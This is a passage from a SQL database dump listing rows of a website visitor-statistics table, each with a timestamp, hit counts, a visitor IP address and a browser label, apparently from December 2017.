64.16',''),(188037,1513685499,1,1,0,0,'137.74.207.102','other'),(188038,1513685666,1,1,0,0,'46.211.120.119','other'),(188039,1513685811,1,0,1,0,'66.249.64.8',''),(188040,1513686064,1,1,0,0,'51.255.71.116','other'),(188041,1513686119,1,1,0,0,'95.132.36.18','firefox'),(188042,1513686289,1,1,0,0,'37.53.128.188','chrome'),(188043,1513686534,1,1,0,0,'37.55.225.48','chrome'),(188044,1513686757,1,1,0,0,'178.94.207.122','chrome'),(188045,1513686771,2,2,0,0,'141.8.142.74','other'),(188046,1513687236,1,1,0,0,'91.196.178.166','chrome'),(188047,1513687393,2,2,0,0,'37.52.18.139','firefox'),(188048,1513687618,1,1,0,0,'2.92.32.178','msie'),(188049,1513687763,1,1,0,0,'178.95.57.54','chrome'),(188050,1513689011,1,1,0,0,'93.183.196.182','chrome'),(188051,1513689154,1,1,0,0,'91.196.179.138','chrome'),(188052,1513689163,2,2,0,0,'46.200.254.44','chrome'),(188053,1513689275,1,1,0,0,'37.73.209.51','other'),(188054,1513689324,1,1,0,0,'79.110.128.193','other'),(188055,1513689348,1,1,0,0,'46.211.150.132','chrome'),(188056,1513689350,1,1,0,0,'91.196.178.71','chrome'),(188057,1513689373,2,2,0,0,'96.30.82.149','other'),(188058,1513689404,1,1,0,0,'46.201.82.65','chrome'),(188059,1513689467,4,4,0,0,'141.8.142.74','other'),(188060,1513689535,1,1,0,0,'46.133.210.192','chrome'),(188061,1513689604,1,1,0,0,'184.75.221.237','chrome'),(188062,1513689629,1,0,1,0,'66.249.64.6',''),(188063,1513689640,1,1,0,0,'178.154.171.88','other'),(188064,1513689643,1,1,0,0,'37.9.113.115','other'),(188065,1513689784,1,1,0,0,'37.52.18.139','firefox'),(188066,1513689818,1,1,0,0,'91.124.24.65','chrome'),(188067,1513690483,1,1,0,0,'130.180.217.43','chrome'),(188068,1513690656,1,1,0,0,'66.249.64.6','chrome'),(188069,1513690770,1,1,0,0,'91.196.178.71','chrome'),(188070,1513690804,1,1,0,0,'137.74.207.119','other'),(188071,1513690808,1,1,0,0,'95.132.12.192','chrome'),(188072,1513691198,10,10,0,0,'91.196.177.46','other'),(188073,1513691400,1,1,0,0,'91.196.178.169','chrome'),(188074,1513691613,1,1,0,0,'51.255.71.123','other'),(188075,1513691750,1,1,0,0,'178.93.125.230','chrome'),(188076,1513691868,1,1,0,0,'109.63.254.249','msie'),(188077,1513691930,1,1,0,0,'37.52.18.139','firefox'),(188078,1513692321,1,1,0,0,'51.255.64.106','other'),(188079,1513692329,1,1,0,0,'51.255.71.130','other'),(188080,1513692409,1,1,0,0,'137.74.201.99','other'),(188081,1513692468,1,1,0,0,'8.29.198.25','other'),(188082,1513692783,1,1,0,0,'91.196.178.164','chrome'),(188083,1513693583,1,1,0,0,'194.44.79.193','chrome'),(188084,1513693824,1,1,0,0,'185.2.81.150','chrome'),(188085,1513693983,2,2,0,0,'91.196.178.70','chrome'),(188086,1513693995,1,1,0,0,'51.255.71.122','other'),(188087,1513694268,1,1,0,0,'91.196.178.163','chrome'),(188088,1513694486,1,1,0,0,'91.196.178.56','chrome'),(188089,1513694927,1,1,0,0,'91.196.178.97','firefox'),(188090,1513694946,1,1,0,0,'31.174.163.110','other'),(188091,1513694982,1,1,0,0,'91.196.178.46','chrome'),(188092,1513695099,1,1,0,0,'188.42.34.150','firefox'),(188093,1513695525,1,1,0,0,'93.183.196.182','chrome'),(188094,1513695601,1,1,0,0,'178.93.183.110','chrome'),(188095,1513695695,1,1,0,0,'137.74.207.188','other'),(188096,1513696501,1,1,0,0,'178.93.125.230','chrome'),(188097,1513696886,1,1,0,0,'91.196.178.162','chrome'),(188098,1513697002,1,1,0,0,'51.255.71.118','other'),(188099,1513697036,1,1,0,0,'91.196.178.71','firefox'),(188100,1513697426,1,1,0,0,'51.255.71.113','other'),(188101,1513697855,1,1,0,0,'46.133.239.104','chrome'),(188102,1513698012,1,0,1,0,'66.249.64.6',''),(188103,1513698340,1,1,0,0,'141.8.132.19','other'),(188104,1513698392,1,1,0,0,'164.132.162.160','other'),(188105,1513698501,1,0,1,0,'66.249.70.29',''),(188106,1513698536,1,1,0,0,'188.166.38.243','chrome'),(188107,1513698565,1,1,0,0,'164.132.162.187','other'),(188108,1513698888,1,1,0,0,'162.210.196.130','other'),(188109,1513699382,1,1,0,0,'37.55.57.223','chrome'),(188110,1513700325,1,1,0,0,'91.196.178.168','chrome'),(188111,1513700356,1,0,1,0,'66.249.64.8',''),(188112,1513700691,1,1,0,0,'51.255.71.117','other'),(188113,1513700884,2,2,0,0,'141.8.142.74','other'),(188114,1513701044,1,1,0,0,'178.154.171.88','other'),(188115,1513701099,1,1,0,0,'137.74.203.194','other'),(188116,1513701140,1,1,0,0,'37.73.198.48','other'),(188117,1513701394,1,1,0,0,'91.196.178.168','chrome'),(188118,1513701614,1,1,0,0,'137.74.207.159','other'),(188119,1513702221,1,1,0,0,'176.31.231.10','other'),(188120,1513702231,1,1,0,0,'92.113.174.216','chrome'),(188121,1513702328,1,1,0,0,'137.74.207.114','other'),(188122,1513702827,1,1,0,0,'207.46.13.137','other'),(188123,1513703299,1,1,0,0,'8.29.198.27','other'),(188124,1513703427,1,0,1,0,'66.249.64.10',''),(188125,1513703740,1,1,0,0,'178.154.171.88','other'),(188126,1513704556,1,1,0,0,'92.113.190.96','chrome'),(188127,1513704778,1,1,0,0,'178.154.171.88','other'),(188128,1513705109,1,1,0,0,'51.255.71.98','other'),(188129,1513705405,1,1,0,0,'141.8.142.74','other'),(188130,1513705571,1,1,0,0,'51.255.71.114','other'),(188131,1513705733,1,1,0,0,'164.132.162.159','other'),(188132,1513706095,1,1,0,0,'91.196.178.163','chrome'),(188133,1513706312,1,1,0,0,'92.113.127.37','chrome'),(188134,1513706521,1,1,0,0,'178.154.171.88','other'),(188135,1513706627,1,1,0,0,'207.46.13.141','other'),(188136,1513706730,1,1,0,0,'91.196.178.104','chrome'),(188137,1513707098,1,1,0,0,'137.74.207.120','other'),(188138,1513707101,1,1,0,0,'95.132.3.210','chrome'),(188139,1513707485,1,1,0,0,'66.249.65.158','chrome'),(188140,1513707679,1,1,0,0,'137.74.207.116','other'),(188141,1513707988,1,1,0,0,'91.196.178.101','chrome'),(188142,1513708322,1,1,0,0,'141.8.142.74','other'),(188143,1513708486,1,1,0,0,'178.154.171.88','other'),(188144,1513708858,1,1,0,0,'51.255.71.117','other'),(188145,1513708989,1,1,0,0,'37.53.162.38','chrome'),(188146,1513709034,1,1,0,0,'51.255.71.111','other'),(188147,1513709045,1,1,0,0,'35.225.221.87','other'),(188148,1513709238,1,0,1,0,'66.249.73.25',''),(188149,1513709637,1,1,0,0,'137.74.201.100','other'),(188150,1513709791,1,1,0,0,'178.92.250.50','chrome'),(188151,1513709881,1,1,0,0,'91.196.177.11','other'),(188152,1513710051,1,1,0,0,'95.132.133.159','chrome'),(188153,1513710105,1,1,0,0,'37.9.113.114','other'),(188154,1513710271,1,1,0,0,'92.113.188.90','chrome'),(188155,1513710821,2,0,2,0,'66.249.65.156',''),(188156,1513711080,1,1,0,0,'141.8.142.74','other'),(188157,1513711105,1,1,0,0,'91.124.118.171','chrome'),(188158,1513711511,1,0,1,0,'66.249.65.157',''),(188159,1513711657,1,1,0,0,'51.255.71.100','other'),(188160,1513711953,1,1,0,0,'82.145.221.128','chrome'),(188161,1513712258,1,1,0,0,'51.255.71.129','other'),(188162,1513712356,1,1,0,0,'137.74.207.109','other'),(188163,1513712894,1,1,0,0,'141.8.142.74','other'),(188164,1513714131,1,1,0,0,'8.29.198.26','other'),(188165,1513714303,1,1,0,0,'91.196.178.67','other'),(188166,1513714527,1,1,0,0,'92.113.190.96','chrome'),(188167,1513715175,1,1,0,0,'91.196.178.102','chrome'),(188168,1513715439,1,0,1,0,'66.249.73.25',''),(188169,1513715634,1,1,0,0,'195.191.12.10','other'),(188170,1513715725,1,1,0,0,'164.132.162.187','other'),(188171,1513715960,1,1,0,0,'91.209.11.236','other'),(188172,1513716426,1,1,0,0,'95.135.240.2','chrome'),(188173,1513716633,1,1,0,0,'51.255.71.133','other'),(188174,1513716772,1,1,0,0,'141.8.142.74','other'),(188175,1513716903,1,1,0,0,'51.255.71.132','other'),(188176,1513717356,1,1,0,0,'137.74.207.102','other'),(188177,1513717576,1,1,0,0,'37.147.233.113','msie'),(188178,1513718052,1,1,0,0,'46.133.107.166','chrome'),(188179,1513718184,1,1,0,0,'66.249.73.23','chrome'),(188180,1513718339,1,1,0,0,'188.146.1.149','chrome'),(188181,1513718395,1,1,0,0,'46.188.40.97','msie'),(188182,1513718620,1,1,0,0,'51.255.71.111','other'),(188183,1513718939,1,1,0,0,'178.154.171.88','other'),(188184,1513719180,1,1,0,0,'5.228.129.95','msie'),(188185,1513719201,1,1,0,0,'34.243.22.154','other'),(188186,1513719319,1,1,0,0,'51.255.71.110','other'),(188187,1513719552,1,1,0,0,'51.255.71.123','other'),(188188,1513719579,1,1,0,0,'188.163.17.121','chrome'),(188189,1513719808,1,1,0,0,'93.170.175.75','chrome'),(188190,1513719849,1,1,0,0,'51.255.71.131','other'),(188191,1513720120,1,0,1,0,'66.249.73.23',''),(188192,1513720337,1,1,0,0,'164.132.162.188','other'),(188193,1513720514,1,1,0,0,'188.163.17.121','chrome'),(188194,1513720646,1,1,0,0,'109.63.167.250','msie'),(188195,1513721443,1,1,0,0,'141.8.142.74','other'),(188196,1513721645,2,2,0,0,'46.89.232.95','other'),(188197,1513721850,1,1,0,0,'66.249.73.24','chrome'),(188198,1513722726,1,1,0,0,'141.8.142.74','other'),(188199,1513722854,72,72,0,0,'34.243.22.154','other'),(188200,1513723057,1,1,0,0,'130.180.210.34','other'),(188201,1513723244,1,1,0,0,'62.210.201.93','chrome'),(188202,1513723468,1,0,1,0,'66.249.73.24',''),(188203,1513724457,1,1,0,0,'46.89.232.95','other'),(188204,1513724580,1,1,0,0,'35.225.221.87','other'),(188205,1513724745,1,1,0,0,'164.132.162.154','other'),(188206,1513724982,1,1,0,0,'8.29.198.26','other'),(188207,1513725663,1,1,0,0,'46.188.40.97','msie'),(188208,1513726028,1,0,1,0,'66.249.65.157',''),(188209,1513726382,1,0,1,0,'66.249.73.24',''),(188210,1513726648,1,1,0,0,'5.228.129.95','msie'),(188211,1513726905,1,1,0,0,'5.16.28.84','msie'),(188212,1513727379,1,1,0,0,'51.255.71.111','other'),(188213,1513727779,1,1,0,0,'217.69.134.227','other'),(188214,1513728604,1,1,0,0,'54.171.85.103','other'),(188215,1513728704,1,1,0,0,'137.74.207.119','other'),(188216,1513729080,1,0,1,0,'66.249.73.24',''),(188217,1513729177,1,1,0,0,'141.8.142.74','other'),(188218,1513729300,1,0,1,0,'66.249.73.23',''),(188219,1513729646,1,1,0,0,'109.63.167.250','msie'),(188220,1513729955,1,1,0,0,'66.249.65.156','chrome'),(188221,1513730060,1,1,0,0,'217.69.133.235','other'),(188222,1513730598,1,0,1,0,'66.249.73.135',''),(188223,1513730607,1,1,0,0,'35.225.221.87','other'),(188224,1513731433,1,1,0,0,'51.255.71.115','other'),(188225,1513731491,1,1,0,0,'51.255.71.131','other'),(188226,1513731538,1,1,0,0,'51.255.71.119','other'),(188227,1513731697,1,1,0,0,'141.8.142.74','other'),(188228,1513731938,1,0,1,0,'68.180.229.52',''),(188229,1513732469,1,1,0,0,'37.147.233.113','msie'),(188230,1513732821,1,1,0,0,'37.9.113.101','other'),(188231,1513733013,2,2,0,0,'141.8.142.74','other'),(188232,1513733145,1,1,0,0,'46.188.40.97','msie'),(188233,1513733555,1,1,0,0,'144.76.38.40','other'),(188234,1513733832,1,1,0,0,'66.249.73.24','chrome'),(188235,1513733941,1,1,0,0,'51.255.71.127','other'),(188236,1513734095,1,1,0,0,'5.228.129.95','msie'),(188237,1513734381,1,1,0,0,'137.74.207.108','other'),(188238,1513734402,1,1,0,0,'5.16.28.84','msie'),(188239,1513734507,1,0,1,0,'66.249.73.23',''),(188240,1513734745,2,2,0,0,'195.154.199.74','chrome'),(188241,1513735134,4,4,0,0,'192.151.145.178','other'),(188242,1513735414,1,1,0,0,'141.8.142.74','other'),(188243,1513735820,1,1,0,0,'8.29.198.26','other'),(188244,1513736563,1,1,0,0,'51.255.71.130','other'),(188245,1513736723,1,1,0,0,'207.46.13.103','other'),(188246,1513737341,1,1,0,0,'51.255.71.123','other'),(188247,1513737394,1,1,0,0,'141.8.142.74','other'),(188248,1513737601,1,1,0,0,'51.255.71.98','other'),(188249,1513737765,1,1,0,0,'178.154.171.88','other'),(188250,1513738504,3,3,0,0,'141.8.142.74','other'),(188251,1513738734,1,0,1,0,'66.249.73.25',''),(188252,1513738747,1,1,0,0,'109.63.167.250','msie'),(188253,1513739093,1,0,1,0,'66.249.73.220',''),(188254,1513739167,2,2,0,0,'178.154.171.88','other'),(188255,1513739532,1,1,0,0,'141.8.142.74','other'),(188256,1513740064,1,1,0,0,'66.249.73.222','chrome'),(188257,1513740853,3,3,0,0,'178.154.171.88','other'),(188258,1513741025,1,1,0,0,'185.220.101.29','chrome'),(188259,1513741251,1,1,0,0,'37.147.233.113','msie'),(188260,1513741867,1,1,0,0,'137.74.201.99','other'),(188261,1513741981,1,1,0,0,'178.154.171.88','other'),(188262,1513741996,2,2,0,0,'141.8.142.74','other'),(188263,1513742197,1,0,1,0,'66.249.73.25',''),(188264,1513742224,1,1,0,0,'46.188.40.97','msie'),(188265,1513742467,1,1,0,0,'164.132.162.154','other'),(188266,1513742561,1,1,0,0,'137.74.207.114','other'),(188267,1513742897,1,1,0,0,'178.154.171.88','other'),(188268,1513742899,1,1,0,0,'5.228.129.95','msie'),(188269,1513743075,1,1,0,0,'51.255.71.113','other'),(188270,1513743241,1,1,0,0,'51.255.71.110','other'),(188271,1513743248,1,1,0,0,'141.8.142.74','other'),(188272,1513743263,1,1,0,0,'5.16.28.84','msie'),(188273,1513743610,1,0,1,0,'66.249.73.222',''),(188274,1513744071,1,1,0,0,'66.249.73.24','chrome'),(188275,1513744663,120,120,0,0,'34.243.22.154','other'),(188276,1513745536,2,2,0,0,'178.154.171.88','other'),(188277,1513745567,128,128,0,0,'34.243.22.154','other'),(188278,1513745628,2,2,0,0,'35.225.221.87','other'),(188279,1513745838,4,4,0,0,'144.76.8.66','other'),(188280,1513746487,58,58,0,0,'34.243.22.154','other'),(188281,1513746561,1,1,0,0,'178.154.171.88','other'),(188282,1513746651,1,1,0,0,'8.29.198.25','other'),(188283,1513746884,2,2,0,0,'141.8.142.74','other'),(188284,1513747062,1,1,0,0,'137.74.207.110','other'),(188285,1513747652,1,1,0,0,'109.63.167.250','msie'),(188286,1513748054,1,1,0,0,'51.255.64.106','other'),(188287,1513748170,1,0,1,0,'66.249.73.221',''),(188288,1513748246,2,2,0,0,'178.154.171.88','other'),(188289,1513748405,1,1,0,0,'137.74.201.100','other'),(188290,1513748617,1,1,0,0,'87.250.224.46','other'),(188291,1513748663,1,1,0,0,'37.147.233.113','msie'),(188292,1513748935,1,1,0,0,'91.196.177.46','firefox'),(188293,1513749219,1,1,0,0,'46.188.40.97','msie'),(188294,1513749871,2,2,0,0,'178.154.171.88','other'),(188295,1513749954,2,2,0,0,'141.8.142.74','other'),(188296,1513750210,2,2,0,0,'157.55.39.212','other'),(188297,1513750223,1,1,0,0,'37.9.113.110','other'),(188298,1513750314,1,1,0,0,'5.228.129.95','msie'),(188299,1513750411,1,1,0,0,'51.255.71.129','other'),(188300,1513750536,130,130,0,0,'34.243.22.154','other'),(188301,1513750689,1,1,0,0,'5.16.28.84','msie'),(188302,1513750874,1,0,1,0,'66.249.73.25',''),(188303,1513751038,1,0,1,0,'66.249.73.24',''),(188304,1513751229,1,1,0,0,'91.196.178.97','other'),(188305,1513751247,3,3,0,0,'141.8.142.74','other'),(188306,1513751401,1,0,1,0,'66.249.73.222',''),(188307,1513751784,1,1,0,0,'91.196.178.70','firefox'),(188308,1513751958,1,1,0,0,'164.132.162.154','other'),(188309,1513752187,6,6,0,0,'173.212.226.74','other'),(188310,1513752435,1,1,0,0,'137.74.207.108','other'),(188311,1513752485,1,1,0,0,'178.154.171.88','other'),(188312,1513752522,1,1,0,0,'91.196.178.71','chrome'),(188313,1513752834,2,2,0,0,'141.8.142.74','other'),(188314,1513753037,2,2,0,0,'91.196.178.70','chrome'),(188315,1513753530,1,1,0,0,'178.154.171.4','other'),(188316,1513753930,2,2,0,0,'141.8.142.74','other'),(188317,1513754089,1,0,1,0,'66.249.73.23',''),(188318,1513754136,1,1,0,0,'66.249.73.23','chrome'),(188319,1513754395,1,1,0,0,'51.255.71.133','other'),(188320,1513754438,1,1,0,0,'91.196.178.71','chrome'),(188321,1513754640,2,2,0,0,'89.21.73.109','firefox'),(188322,1513754768,2,2,0,0,'91.196.178.65','firefox'),(188323,1513755069,1,1,0,0,'95.132.23.136','firefox'),(188324,1513755147,2,2,0,0,'91.196.178.166','chrome'),(188325,1513755371,1,1,0,0,'178.54.190.249','chrome'),(188326,1513755716,1,1,0,0,'91.196.177.15','chrome'),(188327,1513755789,1,1,0,0,'141.8.132.19','other'),(188328,1513756152,1,1,0,0,'157.55.39.212','other'),(188329,1513756507,1,1,0,0,'87.250.224.46','other'),(188330,1513756839,1,1,0,0,'46.133.100.216','chrome'),(188331,1513756981,2,2,0,0,'141.8.142.74','other'),(188332,1513757381,1,1,0,0,'137.74.201.100','other'),(188333,1513757427,1,1,0,0,'91.196.178.71','chrome'),(188334,1513757484,1,1,0,0,'8.29.198.26','other'),(188335,1513757650,1,1,0,0,'91.196.178.166','chrome'),(188336,1513758011,1,1,0,0,'164.132.162.155','other'),(188337,1513758121,1,1,0,0,'37.55.246.191','chrome'),(188338,1513758130,1,0,1,0,'66.249.73.24',''),(188339,1513758278,1,1,0,0,'178.154.171.88','other'),(188340,1513758317,1,1,0,0,'137.74.207.159','other'),(188341,1513758717,1,1,0,0,'51.255.71.98','other'),(188342,1513759254,2,2,0,0,'37.9.113.182','other'),(188343,1513759417,1,1,0,0,'91.196.177.46','firefox'),(188344,1513759604,1,1,0,0,'91.196.178.71','chrome'),(188345,1513759805,2,2,0,0,'178.154.171.88','other'),(188346,1513759927,1,1,0,0,'95.134.117.39','chrome'),(188347,1513760258,1,1,0,0,'137.74.207.108','other'),(188348,1513760324,1,1,0,0,'66.249.73.24','chrome'),(188349,1513760408,1,1,0,0,'37.9.113.182','other'),(188350,1513760410,1,1,0,0,'157.55.39.212','other'),(188351,1513760522,1,1,0,0,'164.132.162.158','other'),(188352,1513760565,1,1,0,0,'91.196.178.101','chrome'),(188353,1513760767,1,1,0,0,'37.52.18.139','firefox'),(188354,1513760787,1,1,0,0,'91.196.178.70','chrome'),(188355,1513761308,2,2,0,0,'37.9.113.110','other'),(188356,1513761311,1,1,0,0,'141.8.142.123','other'),(188357,1513761416,1,1,0,0,'87.250.224.85','other'),(188358,1513761528,1,1,0,0,'137.74.207.108','other'),(188359,1513761666,1,0,1,0,'66.249.73.24',''),(188360,1513761700,1,1,0,0,'91.196.178.71','chrome'),(188361,1513762292,1,1,0,0,'91.196.178.162','chrome'),(188362,1513762471,1,1,0,0,'137.74.207.108','other'),(188363,1513762638,1,1,0,0,'164.132.162.153','other'),(188364,1513763003,2,2,0,0,'37.9.113.182','other'),(188365,1513763121,1,1,0,0,'213.180.203.40','other'),(188366,1513763133,1,1,0,0,'217.69.133.222','other'),(188367,1513763270,1,1,0,0,'66.249.73.222','chrome'),(188368,1513763477,1,1,0,0,'91.196.178.97','opera'),(188369,1513763574,1,1,0,0,'89.21.73.109','chrome'),(188370,1513763586,1,1,0,0,'91.196.177.46','other'),(188371,1513763767,1,1,0,0,'141.8.142.74','other'),(188372,1513763858,1,1,0,0,'37.9.113.101','other'),(188373,1513763980,1,1,0,0,'94.179.147.128','chrome'),(188374,1513764170,1,1,0,0,'91.196.178.71','chrome'),(188375,1513764190,1,1,0,0,'137.74.207.159','other'),(188376,1513764819,1,1,0,0,'141.8.142.74','other'),(188377,1513764979,1,1,0,0,'207.46.13.137','other'),(188378,1513764995,1,1,0,0,'178.154.171.4','other'),(188379,1513765317,1,1,0,0,'66.249.73.222','chrome'),(188380,1513765509,1,1,0,0,'51.255.71.122','other'),(188381,1513766204,1,1,0,0,'207.46.13.103','other'),(188382,1513766538,1,1,0,0,'137.74.207.114','other'),(188383,1513766603,1,1,0,0,'157.55.39.203','other'),(188384,1513766604,3,3,0,0,'178.154.171.88','other'),(188385,1513766850,1,1,0,0,'66.249.73.23','chrome'),(188386,1513766899,1,1,0,0,'51.255.71.121','other'),(188387,1513766923,1,0,1,0,'66.249.73.221',''),(188388,1513766957,1,1,0,0,'141.8.142.74','other'),(188389,1513767768,1,1,0,0,'46.211.147.157','chrome'),(188390,1513768308,1,1,0,0,'8.29.198.25','other'),(188391,1513769983,1,1,0,0,'165.227.115.28','chrome'),(188392,1513770354,1,1,0,0,'51.255.71.132','other'),(188393,1513770413,1,1,0,0,'137.74.201.108','other'),(188394,1513770750,1,1,0,0,'78.111.187.121','chrome'),(188395,1513770856,1,1,0,0,'137.74.207.101','other'),(188396,1513770956,1,1,0,0,'130.180.219.99','chrome'),(188397,1513771188,1,1,0,0,'141.8.142.74','other'),(188398,1513771249,1,1,0,0,'37.9.113.182','other'),(188399,1513771289,1,1,0,0,'178.154.171.88','other'),(188400,1513771606,1,1,0,0,'207.46.13.103','other'),(188401,1513771889,1,1,0,0,'107.167.108.185','chrome'),(188402,1513772196,1,1,0,0,'37.9.113.101','other'),(188403,1513772230,1,0,1,0,'66.249.73.25',''),(188404,1513772629,1,1,0,0,'51.255.71.111','other'),(188405,1513772704,1,1,0,0,'207.46.13.137','other'),(188406,1513772914,1,1,0,0,'107.167.108.185','chrome'),(188407,1513773107,1,1,0,0,'91.196.178.70','chrome'),(188408,1513773758,1,1,0,0,'195.54.42.24','chrome'),(188409,1513773883,1,1,0,0,'37.9.113.115','other'),(188410,1513773960,1,1,0,0,'185.41.21.130','chrome'),(188411,1513774472,1,1,0,0,'37.9.113.182','other'),(188412,1513774551,1,1,0,0,'91.196.177.46','other'),(188413,1513774895,1,1,0,0,'51.255.71.129','other'),(188414,1513774971,1,1,0,0,'87.250.224.46','other'),(188415,1513775141,1,1,0,0,'77.111.244.11','chrome'),(188416,1513775230,1,1,0,0,'91.200.53.66','firefox'),(188417,1513775486,1,1,0,0,'91.196.177.15','firefox'),(188418,1513775492,1,1,0,0,'164.132.162.154','other'),(188419,1513775562,1,1,0,0,'54.165.59.7','other'),(188420,1513775874,1,1,0,0,'109.194.87.169','other'),(188421,1513776263,1,1,0,0,'95.133.50.14','chrome'),(188422,1513776422,1,1,0,0,'91.196.178.133','firefox'),(188423,1513777020,2,2,0,0,'87.250.224.46','other'),(188424,1513777312,1,1,0,0,'157.55.39.212','other'),(188425,1513777919,2,2,0,0,'91.196.178.70','chrome'),(188426,1513778525,1,1,0,0,'128.72.228.99','firefox'),(188427,1513778840,1,1,0,0,'178.154.171.88','other'),(188428,1513779147,1,1,0,0,'8.29.198.25','other'),(188429,1513779238,1,1,0,0,'176.96.197.7','chrome'),(188430,1513779254,1,1,0,0,'91.196.178.70','chrome'),(188431,1513780014,1,1,0,0,'94.178.111.251','chrome'),(188432,1513780107,1,1,0,0,'51.255.71.101','other'),(188433,1513780353,72,72,0,0,'54.171.85.103','other'),(188434,1513780510,1,1,0,0,'87.250.224.46','other'),(188435,1513780751,1,1,0,0,'54.165.59.7','other'),(188436,1513780795,1,1,0,0,'82.207.114.36','msie'),(188437,1513780881,1,1,0,0,'37.52.17.82','chrome'),(188438,1513781044,1,1,0,0,'141.8.142.74','other'),(188439,1513781307,1,1,0,0,'207.46.13.137','other'),(188440,1513781670,1,1,0,0,'91.196.178.70','chrome'),(188441,1513781862,1,1,0,0,'157.55.39.203','other'),(188442,1513782461,1,1,0,0,'91.196.178.166','chrome'),(188443,1513782808,1,1,0,0,'207.46.13.137','other'),(188444,1513783493,1,1,0,0,'51.255.71.101','other'),(188445,1513783495,2,2,0,0,'91.196.178.104','chrome'),(188446,1513783738,1,1,0,0,'137.74.207.114','other'),(188447,1513783778,1,1,0,0,'137.74.207.102','other'),(188448,1513785919,1,1,0,0,'137.74.207.159','other'),(188449,1513786987,1,1,0,0,'87.250.224.46','other'),(188450,1513787021,1,1,0,0,'141.8.142.74','other'),(188451,1513787637,1,0,1,0,'66.249.73.24',''),(188452,1513787903,1,1,0,0,'162.210.196.97','other'),(188453,1513788327,1,1,0,0,'51.255.71.118','other'),(188454,1513788526,1,1,0,0,'195.154.199.74','chrome'),(188455,1513789022,1,1,0,0,'46.211.104.82','chrome'),(188456,1513789552,1,1,0,0,'81.162.254.34','chrome'),(188457,1513789583,1,1,0,0,'51.255.71.118','other'),(188458,1513789776,1,0,1,0,'66.249.73.221',''),(188459,1513789981,1,1,0,0,'8.29.198.27','other'),(188460,1513790008,1,0,1,0,'66.249.73.23',''),(188461,1513790620,1,0,1,0,'66.249.73.25',''),(188462,1513790751,1,1,0,0,'212.15.176.253','chrome'),(188463,1513790995,1,1,0,0,'37.9.113.182','other'),(188464,1513791255,1,1,0,0,'164.132.162.154','other'),(188465,1513791469,1,0,1,0,'66.249.73.24',''),(188466,1513791477,1,1,0,0,'46.161.9.39','chrome'),(188467,1513791797,1,1,0,0,'195.181.174.145','chrome'),(188468,1513792279,1,1,0,0,'46.200.3.182','chrome'),(188469,1513792412,1,1,0,0,'95.134.97.247','chrome'),(188470,1513792497,1,1,0,0,'207.46.13.137','other'),(188471,1513792507,1,1,0,0,'51.255.71.112','other'),(188472,1513792895,1,1,0,0,'157.55.39.203','other'),(188473,1513793031,2,2,0,0,'178.154.171.88','other'),(188474,1513793037,1,1,0,0,'141.8.142.74','other'),(188475,1513793279,1,1,0,0,'51.255.71.120','other'),(188476,1513794223,1,1,0,0,'91.196.178.71','firefox'),(188477,1513794850,1,1,0,0,'95.132.31.37','chrome'),(188478,1513795306,1,1,0,0,'87.250.224.46','other'),(188479,1513795748,1,1,0,0,'164.132.162.188','other'),(188480,1513795806,1,0,1,0,'66.249.73.221',''),(188481,1513796126,1,1,0,0,'137.74.207.108','other'),(188482,1513796230,1,1,0,0,'91.196.177.69','firefox'),(188483,1513796633,1,1,0,0,'51.255.71.127','other'),(188484,1513797005,1,1,0,0,'137.74.207.188','other'),(188485,1513797167,2,2,0,0,'178.154.171.88','other'),(188486,1513797736,1,1,0,0,'141.8.132.19','other'),(188487,1513797860,1,0,1,0,'66.249.73.23',''),(188488,1513797967,1,1,0,0,'158.69.117.141','other'),(188489,1513797986,1,1,0,0,'158.69.117.141','chrome'),(188490,1513798048,1,1,0,0,'91.196.178.168','firefox'),(188491,1513799256,1,1,0,0,'46.211.7.223','chrome'),(188492,1513799284,1,1,0,0,'91.196.178.71','chrome'),(188493,1513799317,1,1,0,0,'178.151.221.42','chrome'),(188494,1513799398,1,1,0,0,'165.227.128.167','chrome'),(188495,1513799896,1,1,0,0,'51.255.71.121','other'),(188496,1513800769,1,1,0,0,'87.250.224.46','other'),(188497,1513800815,1,1,0,0,'8.29.198.25','other'),(188498,1513800950,1,1,0,0,'157.55.39.203','other'),(188499,1513800982,1,1,0,0,'164.132.162.154','other'),(188500,1513801119,1,1,0,0,'37.73.169.117','chrome'),(188501,1513801359,1,1,0,0,'51.255.71.116','other'),(188502,1513801992,1,1,0,0,'78.111.185.57','chrome'),(188503,1513802159,1,0,1,0,'66.249.64.30',''),(188504,1513803432,1,1,0,0,'91.196.178.61','chrome'),(188505,1513804076,1,1,0,0,'157.55.39.212','other'),(188506,1513804248,1,1,0,0,'51.255.71.119','other'),(188507,1513804714,1,1,0,0,'51.255.71.125','other'),(188508,1513805158,1,1,0,0,'82.193.115.183','chrome'),(188509,1513805706,1,1,0,0,'107.167.109.85','other'),(188510,1513805834,1,1,0,0,'165.227.87.163','chrome'),(188511,1513805879,1,1,0,0,'137.74.207.108','other'),(188512,1513806415,1,1,0,0,'157.55.39.212','other'),(188513,1513806457,1,1,0,0,'164.132.162.158','other'),(188514,1513806706,1,0,1,0,'66.249.70.29',''),(188515,1513808567,2,0,2,0,'66.249.64.28',''),(188516,1513809128,2,0,2,0,'66.249.64.29',''),(188517,1513811535,1,1,0,0,'51.255.71.130','other'),(188518,1513811646,1,1,0,0,'8.29.198.27','other'),(188519,1513811701,1,1,0,0,'195.154.199.74','chrome'),(188520,1513811760,1,1,0,0,'137.74.201.100','other'),(188521,1513814109,2,2,0,0,'66.249.64.29','chrome'),(188522,1513814935,1,1,0,0,'176.31.231.10','other'),(188523,1513815825,1,0,1,0,'66.249.70.25',''),(188524,1513815943,1,1,0,0,'66.249.64.29','chrome'),(188525,1513816133,1,1,0,0,'51.255.71.131','other'),(188526,1513817229,1,1,0,0,'31.13.114.115','other'),(188527,1513817875,1,1,0,0,'54.165.59.7','other'),(188528,1513819107,1,0,1,0,'66.249.70.27',''),(188529,1513819131,1,1,0,0,'13.56.229.65','chrome'),(188530,1513819539,1,1,0,0,'207.46.13.103','other'),(188531,1513820046,1,1,0,0,'176.193.119.211','msie'),(188532,1513820047,1,1,0,0,'46.242.73.10','msie'),(188533,1513820232,1,1,0,0,'137.74.201.99','other'),(188534,1513820296,1,1,0,0,'54.165.59.7','other'),(188535,1513820818,1,1,0,0,'164.132.164.180','other'),(188536,1513822140,1,1,0,0,'51.255.71.127','other'),(188537,1513822480,1,1,0,0,'8.29.198.26','other'),(188538,1513823271,1,0,1,0,'66.249.70.29',''),(188539,1513824742,1,1,0,0,'164.132.162.158','other'),(188540,1513824816,1,0,1,0,'66.249.64.28',''),(188541,1513825067,1,1,0,0,'54.165.59.7','other'),(188542,1513825228,1,1,0,0,'51.255.71.100','other'),(188543,1513825293,1,1,0,0,'178.154.171.81','other'),(1